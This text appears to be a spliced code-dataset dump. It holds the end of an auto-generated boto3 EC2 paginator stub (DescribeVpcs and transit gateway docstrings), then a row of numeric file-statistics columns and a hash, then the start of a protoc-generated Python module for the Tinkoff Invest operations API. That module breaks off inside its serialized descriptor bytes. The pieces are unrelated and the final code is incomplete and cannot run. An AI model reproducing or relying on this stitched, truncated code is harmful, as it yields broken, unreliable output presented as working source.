- **Ipv6CidrBlock** *(string) --*
The IPv6 CIDR block.
- **Ipv6CidrBlockState** *(dict) --*
Information about the state of the CIDR block.
- **State** *(string) --*
The state of the CIDR block.
- **StatusMessage** *(string) --*
A message about the status of the CIDR block, if applicable.
- **CidrBlockAssociationSet** *(list) --*
Information about the IPv4 CIDR blocks associated with the VPC.
- *(dict) --*
Describes an IPv4 CIDR block associated with a VPC.
- **AssociationId** *(string) --*
The association ID for the IPv4 CIDR block.
- **CidrBlock** *(string) --*
The IPv4 CIDR block.
- **CidrBlockState** *(dict) --*
Information about the state of the CIDR block.
- **State** *(string) --*
The state of the CIDR block.
- **StatusMessage** *(string) --*
A message about the status of the CIDR block, if applicable.
- **IsDefault** *(boolean) --*
Indicates whether the VPC is the default VPC.
- **Tags** *(list) --*
Any tags assigned to the VPC.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type Filters: list
:param Filters:
One or more filters.
* ``cidr`` - The primary IPv4 CIDR block of the VPC. The CIDR block you specify must exactly match the VPC\'s CIDR block for information to be returned for the VPC. Must contain the slash followed by one or two digits (for example, ``/28`` ).
* ``cidr-block-association.cidr-block`` - An IPv4 CIDR block associated with the VPC.
* ``cidr-block-association.association-id`` - The association ID for an IPv4 CIDR block associated with the VPC.
* ``cidr-block-association.state`` - The state of an IPv4 CIDR block associated with the VPC.
* ``dhcp-options-id`` - The ID of a set of DHCP options.
* ``ipv6-cidr-block-association.ipv6-cidr-block`` - An IPv6 CIDR block associated with the VPC.
* ``ipv6-cidr-block-association.association-id`` - The association ID for an IPv6 CIDR block associated with the VPC.
* ``ipv6-cidr-block-association.state`` - The state of an IPv6 CIDR block associated with the VPC.
* ``isDefault`` - Indicates whether the VPC is the default VPC.
* ``owner-id`` - The ID of the AWS account that owns the VPC.
* ``state`` - The state of the VPC (``pending`` | ``available`` ).
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-id`` - The ID of the VPC.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type VpcIds: list
:param VpcIds:
One or more VPC IDs.
Default: Describes all your VPCs.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class GetTransitGatewayAttachmentPropagations(Paginator):
def paginate(self, TransitGatewayAttachmentId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.get_transit_gateway_attachment_propagations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayAttachmentPropagations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayAttachmentId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGatewayAttachmentPropagations': [
{
'TransitGatewayRouteTableId': 'string',
'State': 'enabling'|'enabled'|'disabling'|'disabled'
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGatewayAttachmentPropagations** *(list) --*
Information about the propagation route tables.
- *(dict) --*
Describes a propagation route table.
- **TransitGatewayRouteTableId** *(string) --*
The ID of the propagation route table.
- **State** *(string) --*
The state of the propagation route table.
:type TransitGatewayAttachmentId: string
:param TransitGatewayAttachmentId: **[REQUIRED]**
The ID of the attachment.
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``transit-gateway-route-table-id`` - The ID of the transit gateway route table.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class GetTransitGatewayRouteTableAssociations(Paginator):
def paginate(self, TransitGatewayRouteTableId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.get_transit_gateway_route_table_associations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayRouteTableAssociations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayRouteTableId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Associations': [
{
'TransitGatewayAttachmentId': 'string',
'ResourceId': 'string',
'ResourceType': 'vpc'|'vpn',
'State': 'associating'|'associated'|'disassociating'|'disassociated'
},
],
}
**Response Structure**
- *(dict) --*
- **Associations** *(list) --*
Information about the associations.
- *(dict) --*
Describes an association between a route table and a resource attachment.
- **TransitGatewayAttachmentId** *(string) --*
The ID of the attachment.
- **ResourceId** *(string) --*
The ID of the resource.
- **ResourceType** *(string) --*
The resource type.
- **State** *(string) --*
The state of the association.
:type TransitGatewayRouteTableId: string
:param TransitGatewayRouteTableId: **[REQUIRED]**
The ID of the transit gateway route table.
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``resource-id`` - The ID of the resource.
* ``resource-type`` - The resource type (``vpc`` | ``vpn`` ).
* ``transit-gateway-attachment-id`` - The ID of the attachment.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class GetTransitGatewayRouteTablePropagations(Paginator):
def paginate(self, TransitGatewayRouteTableId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.get_transit_gateway_route_table_propagations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/GetTransitGatewayRouteTablePropagations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayRouteTableId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGatewayRouteTablePropagations': [
{
'TransitGatewayAttachmentId': 'string',
'ResourceId': 'string',
'ResourceType': 'vpc'|'vpn',
'State': 'enabling'|'enabled'|'disabling'|'disabled'
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGatewayRouteTablePropagations** *(list) --*
Information about the route table propagations.
- *(dict) --*
Describes a route table propagation.
- **TransitGatewayAttachmentId** *(string) --*
The ID of the attachment.
- **ResourceId** *(string) --*
The ID of the resource.
- **ResourceType** *(string) --*
The type of resource.
- **State** *(string) --*
The state of the resource.
:type TransitGatewayRouteTableId: string
:param TransitGatewayRouteTableId: **[REQUIRED]**
The ID of the transit gateway route table.
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``resource-id`` - The ID of the resource.
* ``resource-type`` - The resource type (``vpc`` | ``vpn`` ).
* ``transit-gateway-attachment-id`` - The ID of the attachment.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
| 60.979361
| 2,679
| 0.517366
| 60,721
| 652,967
| 5.556562
| 0.03358
| 0.014197
| 0.007303
| 0.009544
| 0.800267
| 0.767321
| 0.737988
| 0.708142
| 0.682946
| 0.657273
| 0
| 0.020046
| 0.37682
| 652,967
| 10,707
| 2,680
| 60.985057
| 0.809118
| 0.851911
| 0
| 0.387755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326531
| false
| 0.326531
| 0.040816
| 0
| 0.693878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
b4c8fe794117bc0e776b4851544c3df435f9bf27
| 124,516
|
py
|
Python
|
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
tinkoff/invest/grpc/operations_pb2.py
|
forked-group/invest-python
|
3398391f5bb4a52020c312855de175cfe8cdc021
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tinkoff/invest/grpc/operations.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
from tinkoff.invest.grpc import common_pb2 as tinkoff_dot_invest_dot_grpc_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tinkoff/invest/grpc/operations.proto',
package='tinkoff.public.invest.api.contract.v1',
syntax='proto3',
serialized_options=b'\n\034ru.tinkoff.piapi.contract.v1P\001Z\014./;investapi\242\002\005TIAPI\252\002\024Tinkoff.InvestApi.V1\312\002\021Tinkoff\\Invest\\V1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n$tinkoff/invest/grpc/operations.proto\x12%tinkoff.public.invest.api.contract.v1\x1a\x1fgoogle/protobuf/timestamp.proto\x1a tinkoff/invest/grpc/common.proto\"\xcd\x01\n\x11OperationsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x44\n\x05state\x18\x04 \x01(\x0e\x32\x35.tinkoff.public.invest.api.contract.v1.OperationState\x12\x0c\n\x04\x66igi\x18\x05 \x01(\t\"Z\n\x12OperationsResponse\x12\x44\n\noperations\x18\x01 \x03(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Operation\"\xaf\x04\n\tOperation\x12\n\n\x02id\x18\x01 \x01(\t\x12\x1b\n\x13parent_operation_id\x18\x02 \x01(\t\x12\x10\n\x08\x63urrency\x18\x03 \x01(\t\x12\x42\n\x07payment\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12@\n\x05price\x18\x05 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x44\n\x05state\x18\x06 \x01(\x0e\x32\x35.tinkoff.public.invest.api.contract.v1.OperationState\x12\x10\n\x08quantity\x18\x07 \x01(\x03\x12\x15\n\rquantity_rest\x18\x08 \x01(\x03\x12\x0c\n\x04\x66igi\x18\t \x01(\t\x12\x17\n\x0finstrument_type\x18\n \x01(\t\x12(\n\x04\x64\x61te\x18\x0b \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0c\n\x04type\x18\x0c \x01(\t\x12L\n\x0eoperation_type\x18\r \x01(\x0e\x32\x34.tinkoff.public.invest.api.contract.v1.OperationType\x12\x45\n\x06trades\x18\x0e \x03(\x0b\x32\x35.tinkoff.public.invest.api.contract.v1.OperationTrade\"\xa5\x01\n\x0eOperationTrade\x12\x10\n\x08trade_id\x18\x01 \x01(\t\x12-\n\tdate_time\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x10\n\x08quantity\x18\x03 \x01(\x03\x12@\n\x05price\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\"&\n\x10PortfolioRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xbb\x04\n\x11PortfolioResponse\x12N\n\x13total_amount_shares\x18\x01 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12M\n\x12total_amount_bonds\x18\x02 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12K\n\x10total_amount_etf\x18\x03 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12R\n\x17total_amount_currencies\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12O\n\x14total_amount_futures\x18\x05 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12H\n\x0e\x65xpected_yield\x18\x06 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12K\n\tpositions\x18\x07 \x03(\x0b\x32\x38.tinkoff.public.invest.api.contract.v1.PortfolioPosition\"&\n\x10PositionsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xd7\x02\n\x11PositionsResponse\x12@\n\x05money\x18\x01 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x42\n\x07\x62locked\x18\x02 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12N\n\nsecurities\x18\x03 \x03(\x0b\x32:.tinkoff.public.invest.api.contract.v1.PositionsSecurities\x12\"\n\x1alimits_loading_in_progress\x18\x04 \x01(\x08\x12H\n\x07\x66utures\x18\x05 \x03(\x0b\x32\x37.tinkoff.public.invest.api.contract.v1.PositionsFutures\"+\n\x15WithdrawLimitsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xec\x01\n\x16WithdrawLimitsResponse\x12@\n\x05money\x18\x01 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x42\n\x07\x62locked\x18\x02 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12L\n\x11\x62locked_guarantee\x18\x03 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\"\xa3\x05\n\x11PortfolioPosition\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x17\n\x0finstrument_type\x18\x02 \x01(\t\x12\x42\n\x08quantity\x18\x03 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12Q\n\x16\x61verage_position_price\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12H\n\x0e\x65xpected_yield\x18\x05 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\x46\n\x0b\x63urrent_nkd\x18\x06 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12S\n\x19\x61verage_position_price_pt\x18\x07 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12H\n\rcurrent_price\x18\x08 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12V\n\x1b\x61verage_position_price_fifo\x18\t \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12G\n\rquantity_lots\x18\n \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\"E\n\x13PositionsSecurities\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x0f\n\x07\x62locked\x18\x02 \x01(\x03\x12\x0f\n\x07\x62\x61lance\x18\x03 \x01(\x03\"B\n\x10PositionsFutures\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x0f\n\x07\x62locked\x18\x02 \x01(\x03\x12\x0f\n\x07\x62\x61lance\x18\x03 \x01(\x03\"\xf2\x01\n\x13\x42rokerReportRequest\x12l\n\x1egenerate_broker_report_request\x18\x01 \x01(\x0b\x32\x42.tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequestH\x00\x12\x62\n\x19get_broker_report_request\x18\x02 \x01(\x0b\x32=.tinkoff.public.invest.api.contract.v1.GetBrokerReportRequestH\x00\x42\t\n\x07payload\"\xf7\x01\n\x14\x42rokerReportResponse\x12n\n\x1fgenerate_broker_report_response\x18\x01 \x01(\x0b\x32\x43.tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponseH\x00\x12\x64\n\x1aget_broker_report_response\x18\x02 \x01(\x0b\x32>.tinkoff.public.invest.api.contract.v1.GetBrokerReportResponseH\x00\x42\t\n\x07payload\"\x83\x01\n\x1bGenerateBrokerReportRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\"/\n\x1cGenerateBrokerReportResponse\x12\x0f\n\x07task_id\x18\x01 \x01(\t\"7\n\x16GetBrokerReportRequest\x12\x0f\n\x07task_id\x18\x01 \x01(\t\x12\x0c\n\x04page\x18\x02 \x01(\x05\"\x9b\x01\n\x17GetBrokerReportResponse\x12J\n\rbroker_report\x18\x01 \x03(\x0b\x32\x33.tinkoff.public.invest.api.contract.v1.BrokerReport\x12\x12\n\nitemsCount\x18\x02 \x01(\x05\x12\x12\n\npagesCount\x18\x03 \x01(\x05\x12\x0c\n\x04page\x18\x04 \x01(\x05\"\xda\x08\n\x0c\x42rokerReport\x12\x10\n\x08trade_id\x18\x01 \x01(\t\x12\x10\n\x08order_id\x18\x02 \x01(\t\x12\x0c\n\x04\x66igi\x18\x03 \x01(\t\x12\x14\n\x0c\x65xecute_sign\x18\x04 \x01(\t\x12\x32\n\x0etrade_datetime\x18\x05 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x10\n\x08\x65xchange\x18\x06 \x01(\t\x12\x12\n\nclass_code\x18\x07 \x01(\t\x12\x11\n\tdirection\x18\x08 \x01(\t\x12\x0c\n\x04name\x18\t \x01(\t\x12\x0e\n\x06ticker\x18\n \x01(\t\x12@\n\x05price\x18\x0b \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x10\n\x08quantity\x18\x0c \x01(\x03\x12G\n\x0corder_amount\x18\r \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x43\n\taci_value\x18\x0e \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12M\n\x12total_order_amount\x18\x0f \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12L\n\x11\x62roker_commission\x18\x10 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12N\n\x13\x65xchange_commission\x18\x11 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12W\n\x1c\x65xchange_clearing_commission\x18\x12 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x43\n\trepo_rate\x18\x13 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\r\n\x05party\x18\x14 \x01(\t\x12\x34\n\x10\x63lear_value_date\x18\x15 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x32\n\x0esec_value_date\x18\x16 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x15\n\rbroker_status\x18\x17 \x01(\t\x12\x1f\n\x17separate_agreement_type\x18\x18 \x01(\t\x12!\n\x19separate_agreement_number\x18\x19 \x01(\t\x12\x1f\n\x17separate_agreement_date\x18\x1a \x01(\t\x12\x15\n\rdelivery_type\x18\x1b \x01(\t\"\xa8\x02\n GetDividendsForeignIssuerRequest\x12\x80\x01\n\"generate_div_foreign_issuer_report\x18\x01 \x01(\x0b\x32R.tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequestH\x00\x12v\n\x1dget_div_foreign_issuer_report\x18\x02 \x01(\x0b\x32M.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequestH\x00\x42\t\n\x07payload\"\xb0\x02\n!GetDividendsForeignIssuerResponse\x12\x8a\x01\n+generate_div_foreign_issuer_report_response\x18\x01 \x01(\x0b\x32S.tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponseH\x00\x12s\n\x19\x64iv_foreign_issuer_report\x18\x02 \x01(\x0b\x32N.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponseH\x00\x42\t\n\x07payload\"\x93\x01\n+GenerateDividendsForeignIssuerReportRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\"G\n&GetDividendsForeignIssuerReportRequest\x12\x0f\n\x07task_id\x18\x01 \x01(\t\x12\x0c\n\x04page\x18\x02 \x01(\x05\"?\n,GenerateDividendsForeignIssuerReportResponse\x12\x0f\n\x07task_id\x18\x01 \x01(\t\"\xcd\x01\n\'GetDividendsForeignIssuerReportResponse\x12l\n\x1f\x64ividends_foreign_issuer_report\x18\x01 \x03(\x0b\x32\x43.tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport\x12\x12\n\nitemsCount\x18\x02 \x01(\x05\x12\x12\n\npagesCount\x18\x03 \x01(\x05\x12\x0c\n\x04page\x18\x04 \x01(\x05\"\xc9\x04\n\x1c\x44ividendsForeignIssuerReport\x12/\n\x0brecord_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x30\n\x0cpayment_date\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x15\n\rsecurity_name\x18\x03 \x01(\t\x12\x0c\n\x04isin\x18\x04 \x01(\t\x12\x16\n\x0eissuer_country\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x03\x12\x42\n\x08\x64ividend\x18\x07 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12M\n\x13\x65xternal_commission\x18\x08 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12H\n\x0e\x64ividend_gross\x18\t \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12=\n\x03tax\x18\n \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12I\n\x0f\x64ividend_amount\x18\x0b \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\x10\n\x08\x63urrency\x18\x0c \x01(\t*m\n\x0eOperationState\x12\x1f\n\x1bOPERATION_STATE_UNSPECIFIED\x10\x00\x12\x1c\n\x18OPERATION_STATE_EXECUTED\x10\x01\x12\x1c\n\x18OPERATION_STATE_CANCELED\x10\x02*\x8f\x0c\n\rOperationType\x12\x1e\n\x1aOPERATION_TYPE_UNSPECIFIED\x10\x00\x12\x18\n\x14OPERATION_TYPE_INPUT\x10\x01\x12\x1b\n\x17OPERATION_TYPE_BOND_TAX\x10\x02\x12$\n OPERATION_TYPE_OUTPUT_SECURITIES\x10\x03\x12\x1c\n\x18OPERATION_TYPE_OVERNIGHT\x10\x04\x12\x16\n\x12OPERATION_TYPE_TAX\x10\x05\x12&\n\"OPERATION_TYPE_BOND_REPAYMENT_FULL\x10\x06\x12\x1c\n\x18OPERATION_TYPE_SELL_CARD\x10\x07\x12\x1f\n\x1bOPERATION_TYPE_DIVIDEND_TAX\x10\x08\x12\x19\n\x15OPERATION_TYPE_OUTPUT\x10\t\x12!\n\x1dOPERATION_TYPE_BOND_REPAYMENT\x10\n\x12!\n\x1dOPERATION_TYPE_TAX_CORRECTION\x10\x0b\x12\x1e\n\x1aOPERATION_TYPE_SERVICE_FEE\x10\x0c\x12\x1e\n\x1aOPERATION_TYPE_BENEFIT_TAX\x10\r\x12\x1d\n\x19OPERATION_TYPE_MARGIN_FEE\x10\x0e\x12\x16\n\x12OPERATION_TYPE_BUY\x10\x0f\x12\x1b\n\x17OPERATION_TYPE_BUY_CARD\x10\x10\x12#\n\x1fOPERATION_TYPE_INPUT_SECURITIES\x10\x11\x12\x1e\n\x1aOPERATION_TYPE_SELL_MARGIN\x10\x12\x12\x1d\n\x19OPERATION_TYPE_BROKER_FEE\x10\x13\x12\x1d\n\x19OPERATION_TYPE_BUY_MARGIN\x10\x14\x12\x1b\n\x17OPERATION_TYPE_DIVIDEND\x10\x15\x12\x17\n\x13OPERATION_TYPE_SELL\x10\x16\x12\x19\n\x15OPERATION_TYPE_COUPON\x10\x17\x12\x1e\n\x1aOPERATION_TYPE_SUCCESS_FEE\x10\x18\x12$\n OPERATION_TYPE_DIVIDEND_TRANSFER\x10\x19\x12%\n!OPERATION_TYPE_ACCRUING_VARMARGIN\x10\x1a\x12(\n$OPERATION_TYPE_WRITING_OFF_VARMARGIN\x10\x1b\x12\x1f\n\x1bOPERATION_TYPE_DELIVERY_BUY\x10\x1c\x12 \n\x1cOPERATION_TYPE_DELIVERY_SELL\x10\x1d\x12\x1d\n\x19OPERATION_TYPE_TRACK_MFEE\x10\x1e\x12\x1d\n\x19OPERATION_TYPE_TRACK_PFEE\x10\x1f\x12\"\n\x1eOPERATION_TYPE_TAX_PROGRESSIVE\x10 